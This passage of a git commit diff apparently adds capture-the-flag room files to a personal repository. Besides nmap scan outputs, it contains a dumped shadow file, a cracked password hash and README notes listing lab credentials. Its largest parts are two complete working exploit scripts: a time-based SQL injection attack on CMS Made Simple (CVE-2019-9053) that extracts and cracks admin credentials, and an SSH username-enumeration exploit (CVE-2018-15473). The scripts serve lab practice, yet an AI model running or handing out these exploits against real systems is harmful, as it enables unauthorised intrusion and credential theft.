diff options
| author | Raghuram Subramani <raghus2247@gmail.com> | 2022-03-01 14:47:08 +0530 |
|---|---|---|
| committer | Raghuram Subramani <raghus2247@gmail.com> | 2022-03-01 14:47:08 +0530 |
| commit | 71dd1dc672fb230428ed3662f59b552eac70d215 (patch) | |
| tree | cc5da85a62f9b01528cf9570f8e5cc8bd671e9e5 | |
| parent | 248b6067cd7522ea0b4eed4b9ed848707a0a2496 (diff) | |
add rooms
| -rw-r--r-- | .gitattributes | 1 | ||||
| -rw-r--r-- | .gitignore | 1 | ||||
| -rwxr-xr-x | CCPenTesting/nmap/finalbox | 17 | ||||
| -rwxr-xr-x | CCPenTesting/nmap/initial | 11 | ||||
| -rwxr-xr-x | Overpass2Hacked/README.md | 2 | ||||
| -rwxr-xr-x | Overpass2Hacked/cracked.txt | 1 | ||||
| -rwxr-xr-x | Overpass2Hacked/etc-shadow | 5 | ||||
| -rwxr-xr-x | Overpass2Hacked/etc-shadow.txt | 5 | ||||
| -rwxr-xr-x | Overpass2Hacked/hash.txt | 1 | ||||
| -rwxr-xr-x | Overpass2Hacked/nmap/first | 20 | ||||
| -rwxr-xr-x | Overpass2Hacked/overpass2.pcapng | bin | 0 -> 3905904 bytes | |||
| -rw-r--r-- | SimpleCTF/ForMitch.txt | 1 | ||||
| -rw-r--r-- | SimpleCTF/README.md | 7 | ||||
| -rw-r--r-- | SimpleCTF/exploit.py | 186 | ||||
| -rw-r--r-- | SimpleCTF/nmap/initial | 35 | ||||
| -rw-r--r-- | adventofcyber3/day4/README.md | 3 | ||||
| -rw-r--r-- | adventofcyber3/day4/passwords.txt | 15 | ||||
| -rw-r--r-- | internal/45939.py | 65 | ||||
| -rw-r--r-- | internal/README.md | 27 | ||||
| -rw-r--r-- | internal/allPort.gnmap | 0 | ||||
| -rw-r--r-- | internal/allPort.nmap | 0 | ||||
| -rw-r--r-- | internal/allPort.xml | 25 | ||||
| -rw-r--r-- | internal/initial.gnmap | 4 | ||||
| -rw-r--r-- | internal/initial.nmap | 17 | ||||
| -rw-r--r-- | internal/initial.xml | 44 | ||||
| -rw-r--r-- | internal/nmap/initial.nmap | 17 | ||||
| -rw-r--r-- | internal/php-reverse-shell.php | 92 |
27 files changed, 602 insertions, 0 deletions
diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..38c0823 --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +*.vmem filter=lfs diff=lfs merge=lfs -text diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..a86311d --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +compromyse.ovpn diff --git a/CCPenTesting/nmap/finalbox b/CCPenTesting/nmap/finalbox new file mode 100755 index 0000000..03ad7dc --- /dev/null +++ b/CCPenTesting/nmap/finalbox @@ -0,0 +1,17 @@ +# Nmap 7.80 scan initiated Fri Feb 25 09:59:30 2022 as: nmap -sC -sV -oN nmap/finalbox 10.10.235.31 +Nmap scan report for 10.10.235.31 +Host is up (0.18s latency). +Not shown: 998 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA) +| 256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA) +|_ 256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519) +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri Feb 25 09:59:57 2022 -- 1 IP address (1 host up) scanned in 27.09 seconds diff --git a/CCPenTesting/nmap/initial b/CCPenTesting/nmap/initial new file mode 100755 index 0000000..159e74a --- /dev/null +++ b/CCPenTesting/nmap/initial @@ -0,0 +1,11 @@ +# Nmap 7.80 scan initiated Fri Feb 25 08:39:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.52.126 +Nmap scan report for 10.10.52.126 +Host is up (0.19s latency). +Not shown: 999 closed ports +PORT STATE SERVICE VERSION +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri Feb 25 08:39:39 2022 -- 1 IP address (1 host up) scanned in 29.87 seconds diff --git a/Overpass2Hacked/README.md b/Overpass2Hacked/README.md new file mode 100755 index 0000000..9b033d1 --- /dev/null +++ b/Overpass2Hacked/README.md @@ -0,0 +1,2 @@ +attacker ip `192.168.170.145` +dest ip `192.168.170.159`
\ No newline at end of file diff --git a/Overpass2Hacked/cracked.txt b/Overpass2Hacked/cracked.txt new file mode 100755 index 0000000..5ddcbe5 --- /dev/null +++ b/Overpass2Hacked/cracked.txt @@ -0,0 +1 @@ +6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16 diff --git a/Overpass2Hacked/etc-shadow b/Overpass2Hacked/etc-shadow new file mode 100755 index 0000000..270d361 --- /dev/null +++ b/Overpass2Hacked/etc-shadow @@ -0,0 +1,5 @@ +james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: +paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: +szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: +bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: +muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7::: diff --git a/Overpass2Hacked/etc-shadow.txt b/Overpass2Hacked/etc-shadow.txt new file mode 100755 index 0000000..270d361 --- /dev/null +++ b/Overpass2Hacked/etc-shadow.txt @@ -0,0 +1,5 @@ +james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: +paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: +szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: +bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: +muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7::: diff --git a/Overpass2Hacked/hash.txt b/Overpass2Hacked/hash.txt new file mode 100755 index 0000000..6b26fdc --- /dev/null +++ b/Overpass2Hacked/hash.txt @@ -0,0 +1 @@ +6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05 diff --git a/Overpass2Hacked/nmap/first b/Overpass2Hacked/nmap/first new file mode 100755 index 0000000..48f87c3 --- /dev/null +++ b/Overpass2Hacked/nmap/first @@ -0,0 +1,20 @@ +# Nmap 7.80 scan initiated Fri Feb 25 07:48:08 2022 as: nmap -sC -sV -oN nmap/first 10.10.13.215 +Nmap scan report for 10.10.13.215 +Host is up (0.19s latency). +Not shown: 997 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA) +| 256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA) +|_ 256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: LOL Hacked +2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0) +| ssh-hostkey: +|_ 2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA) +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri Feb 25 07:49:16 2022 -- 1 IP address (1 host up) scanned in 68.23 seconds diff --git a/Overpass2Hacked/overpass2.pcapng b/Overpass2Hacked/overpass2.pcapng Binary files differnew file mode 100755 index 0000000..5ec787d --- /dev/null +++ b/Overpass2Hacked/overpass2.pcapng diff --git a/SimpleCTF/ForMitch.txt b/SimpleCTF/ForMitch.txt new file mode 100644 index 0000000..596c727 --- /dev/null +++ b/SimpleCTF/ForMitch.txt @@ -0,0 +1 @@ +Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess! diff --git a/SimpleCTF/README.md b/SimpleCTF/README.md new file mode 100644 index 0000000..b0465a6 --- /dev/null +++ b/SimpleCTF/README.md @@ -0,0 +1,7 @@ +IP address >`10.10.73.108` + +SSH > +``` +mitch +secret +```
\ No newline at end of file diff --git a/SimpleCTF/exploit.py b/SimpleCTF/exploit.py new file mode 100644 index 0000000..260e4e7 --- /dev/null +++ b/SimpleCTF/exploit.py @@ -0,0 +1,186 @@ +#!/usr/bin/env python3
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+ print "[+] Specify an url target"
+ print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+ print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+ print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+ exit()
+
+url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+session = requests.Session()
+dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
+flag = True
+password = ""
+temp_password = ""
+TIME = 1
+db_name = ""
+output = ""
+email = ""
+
+salt = ''
+wordlist = ""
+if options.wordlist:
+ wordlist += options.wordlist
+
+def crack_password():
+ global password
+ global output
+ global wordlist
+ global salt
+ dict = open(wordlist)
+ for line in dict.readlines():
+ line = line.replace("\n", "")
+ beautify_print_try(line)
+ if hashlib.md5(str(salt) + line).hexdigest() == password:
+ output += "\n[+] Password cracked: " + line
+ break
+ dict.close()
+
+def beautify_print_try(value):
+ global output
+ print "\033c"
+ cprint(output,'green', attrs=['bold'])
+ cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
+def beautify_print():
+ global output
+ print "\033c"
+ cprint(output,'green', attrs=['bold'])
+
+def dump_salt():
+ global flag
+ global salt
+ global output
+ ord_salt = ""
+ ord_salt_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_salt = salt + dictionary[i]
+ ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_salt)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ salt = temp_salt
+ ord_salt = ord_salt_temp
+ flag = True
+ output += '\n[+] Salt for password found: ' + salt
+
+def dump_password():
+ global flag
+ global password
+ global output
+ ord_password = ""
+ ord_password_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_password = password + dictionary[i]
+ ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_password)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
+ payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ password = temp_password
+ ord_password = ord_password_temp
+ flag = True
+ output += '\n[+] Password found: ' + password
+
+def dump_username():
+ global flag
+ global db_name
+ global output
+ ord_db_name = ""
+ ord_db_name_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_db_name = db_name + dictionary[i]
+ ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_db_name)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ db_name = temp_db_name
+ ord_db_name = ord_db_name_temp
+ output += '\n[+] Username found: ' + db_name
+ flag = True
+
+def dump_email():
+ global flag
+ global email
+ global output
+ ord_email = ""
+ ord_email_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_email = email + dictionary[i]
+ ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_email)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ email = temp_email
+ ord_email = ord_email_temp
+ output += '\n[+] Email found: ' + email
+ flag = True
+
+dump_salt()
+dump_username()
+dump_email()
+dump_password()
+
+if options.cracking:
+ print colored("[*] Now try to crack password")
+ crack_password()
+
+beautify_print()
\ No newline at end of file diff --git a/SimpleCTF/nmap/initial b/SimpleCTF/nmap/initial new file mode 100644 index 0000000..3ae0e7d --- /dev/null +++ b/SimpleCTF/nmap/initial @@ -0,0 +1,35 @@ +# Nmap 7.80 scan initiated Mon Feb 28 21:34:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.73.108 +Nmap scan report for 10.10.73.108 +Host is up (0.19s latency). +Not shown: 997 filtered ports +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.3 +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_Can't get directory listing: TIMEOUT +| ftp-syst: +| STAT: +| FTP server status: +| Connected to ::ffff:10.17.36.210 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 3 +| vsFTPd 3.0.3 - secure, fast, stable +|_End of status +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +| http-robots.txt: 2 disallowed entries +|_/ /openemr-5_0_1_3 +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA) +| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA) +|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Mon Feb 28 21:35:07 2022 -- 1 IP address (1 host up) scanned in 57.41 seconds diff --git a/adventofcyber3/day4/README.md b/adventofcyber3/day4/README.md new file mode 100644 index 0000000..83d8114 --- /dev/null +++ b/adventofcyber3/day4/README.md @@ -0,0 +1,3 @@ +``` +password > cookie +``` diff --git a/adventofcyber3/day4/passwords.txt b/adventofcyber3/day4/passwords.txt new file mode 100644 index 0000000..6f45b3a --- /dev/null +++ b/adventofcyber3/day4/passwords.txt @@ -0,0 +1,15 @@ +christmas
+elves!
+santa
+festive
+joy123
+myrrh!
+yuletide
+presents
+candy
+tidings
+cookie
+cookies
+biscuits!
+snowball
+snowball123
diff --git a/internal/45939.py b/internal/45939.py new file mode 100644 index 0000000..76298e3 --- /dev/null +++ b/internal/45939.py @@ -0,0 +1,65 @@ +#!/usr/bin/env python2 +# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io +# Credits: Matthew Daley, Justin Gardner, Lee David Painter + +import argparse, logging, paramiko, socket, sys, os + +class InvalidUsername(Exception): + pass + +# malicious function to malform packet +def add_boolean(*args, **kwargs): + pass + +# function that'll be overwritten to malform the packet +old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[ + paramiko.common.MSG_SERVICE_ACCEPT] + +# malicious function to overwrite MSG_SERVICE_ACCEPT handler +def service_accept(*args, **kwargs): + paramiko.message.Message.add_boolean = add_boolean + return old_service_accept(*args, **kwargs) + +# call when username was invalid +def invalid_username(*args, **kwargs): + raise InvalidUsername() + +# assign functions to respective handlers +paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept +paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username + +# perform authentication with malicious packet and username +def check_user(username): + sock = socket.socket() + sock.connect((args.target, args.port)) + transport = paramiko.transport.Transport(sock) + + try: + transport.start_client() + except paramiko.ssh_exception.SSHException: + print '[!] Failed to negotiate SSH transport' + sys.exit(2) + + try: + transport.auth_publickey(username, paramiko.RSAKey.generate(2048)) + except InvalidUsername: + print "[-] {} is an invalid username".format(username) + sys.exit(3) + except paramiko.ssh_exception.AuthenticationException: + print "[+] {} is a valid username".format(username) + +# remove paramiko logging +logging.getLogger('paramiko.transport').addHandler(logging.NullHandler()) + +parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)') +parser.add_argument('target', help="IP address of the target system") +parser.add_argument('-p', '--port', default=22, help="Set port of SSH service") +parser.add_argument('username', help="Username to check for validity.") + +if len(sys.argv) == 1: + parser.print_help() + sys.exit(1) + +args = parser.parse_args() + +check_user(args.username) diff --git a/internal/README.md b/internal/README.md new file mode 100644 index 0000000..9330910 --- /dev/null +++ b/internal/README.md @@ -0,0 +1,27 @@ +IP > `10.10.154.125` + +``` +admin: my2boys +``` + +``` +aubreanna:bubb13guM!@#123 +``` + +``` +Internal Jenkins service is running on 172.17.0.2:8080 +``` +```bash +ssh -f -g -L 5053:192.168.60.101:502 user@192.168.60.100 -N +``` + +Jenkins +``` +admin: spongebob +``` + +root pass + +``` +root:tr0ub13guM!@#123 +``` diff --git a/internal/allPort.gnmap b/internal/allPort.gnmap new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/internal/allPort.gnmap diff --git a/internal/allPort.nmap b/internal/allPort.nmap new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/internal/allPort.nmap diff --git a/internal/allPort.xml b/internal/allPort.xml new file mode 100644 index 0000000..1197b8e --- /dev/null +++ b/internal/allPort.xml @@ -0,0 +1,25 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE nmaprun> +<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?> +<!-- Nmap 7.80 scan initiated Tue Mar 1 12:42:01 2022 as: nmap -p- -oA allPort 10.10.252.197 --> +<nmaprun scanner="nmap" args="nmap -p- -oA allPort 10.10.252.197" start="1646118721" startstr="Tue Mar 1 12:42:01 2022" version="7.80" xmloutputversion="1.04"> +<scaninfo type="connect" protocol="tcp" numservices="65535" services="1-65535"/> +<verbose level="0"/> +<debugging level="0"/> +<taskprogress task="Connect Scan" time="1646118721" percent="0.10"/> +<taskprogress task="Connect Scan" time="1646118722" percent="0.10"/> +<taskprogress task="Connect Scan" time="1646118722" percent="0.16"/> +<taskprogress task="Connect Scan" time="1646118754" percent="2.22" remaining="1455" etc="1646120209"/> +<taskprogress task="Connect Scan" time="1646118763" percent="2.62" remaining="1561" etc="1646120323"/> +<taskprogress task="Connect Scan" time="1646118763" percent="2.64" remaining="1551" etc="1646120314"/> +<taskprogress task="Connect Scan" time="1646118839" percent="13.80" remaining="738" etc="1646119576"/> +<taskprogress task="Connect Scan" time="1646119052" percent="43.55" remaining="430" etc="1646119481"/> +<taskprogress task="Connect Scan" time="1646119100" percent="50.63" remaining="370" etc="1646119470"/> +<taskprogress task="Connect Scan" time="1646119319" percent="73.69" remaining="214" etc="1646119532"/> +<taskprogress task="Connect Scan" time="1646119319" percent="73.69" remaining="214" etc="1646119532"/> +<taskprogress task="Connect Scan" time="1646119319" percent="73.69" remaining="214" etc="1646119532"/> +<taskprogress task="Connect Scan" time="1646119319" percent="73.70" remaining="214" etc="1646119532"/> +<taskprogress task="Connect Scan" time="1646119319" percent="73.70" remaining="214" etc="1646119532"/> +<taskprogress task="Connect Scan" time="1646119409" percent="74.54" remaining="235" etc="1646119644"/> +<taskprogress task="Connect Scan" time="1646119936" percent="79.56" remaining="313" etc="1646120248"/> +<taskprogress task="Connect Scan" time="1646120740" percent="87.02" remaining="302" etc="1646121041"/> diff --git a/internal/initial.gnmap b/internal/initial.gnmap new file mode 100644 index 0000000..06f775b --- /dev/null +++ b/internal/initial.gnmap @@ -0,0 +1,4 @@ +# Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 +Host: 10.10.252.197 (internal.thm) Status: Up +Host: 10.10.252.197 (internal.thm) Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/ Ignored State: closed (998) +# Nmap done at Tue Mar 1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds diff --git a/internal/initial.nmap b/internal/initial.nmap new file mode 100644 index 0000000..e199a01 --- /dev/null +++ b/internal/initial.nmap @@ -0,0 +1,17 @@ +# Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 +Nmap scan report for internal.thm (10.10.252.197) +Host is up (0.18s latency). +Not shown: 998 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA) +| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA) +|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Tue Mar 1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds diff --git a/internal/initial.xml b/internal/initial.xml new file mode 100644 index 0000000..f9ad390 --- /dev/null +++ b/internal/initial.xml @@ -0,0 +1,44 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE nmaprun> +<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?> +<!-- Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 --> +<nmaprun scanner="nmap" args="nmap -sC -sV -oA nmap/initial 10.10.252.197" start="1646117021" startstr="Tue Mar 1 12:13:41 2022" version="7.80" xmloutputversion="1.04"> +<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,